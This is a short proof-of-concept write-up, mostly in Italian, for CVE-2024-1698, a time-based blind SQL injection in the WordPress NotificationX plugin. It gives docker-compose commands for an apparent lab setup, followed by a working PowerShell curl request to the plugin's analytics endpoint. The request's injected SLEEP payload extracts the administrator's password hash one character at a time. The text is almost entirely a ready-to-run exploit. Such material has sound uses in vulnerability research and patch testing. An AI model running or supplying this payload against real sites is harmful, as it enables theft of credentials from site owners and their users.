
Proof-of-concept exploit per CVE-2024-1698, una vulnerabilità di SQL injection cieca nel plugin WordPress NotificationX, che consente l'estrazione time-based dei dati dal database.
docker-compose up --build
docker-compose down
Measure-Command {
curl.exe http://localhost/wp-json/notificationx/v1/analytics `
-Method Post `
-Body 'nx_id=1337&type=clicks`=IF(ASCII(SUBSTRING((select user_pass from wp_users where id=1),1,1))=36,SLEEP(10),null)-- -'
}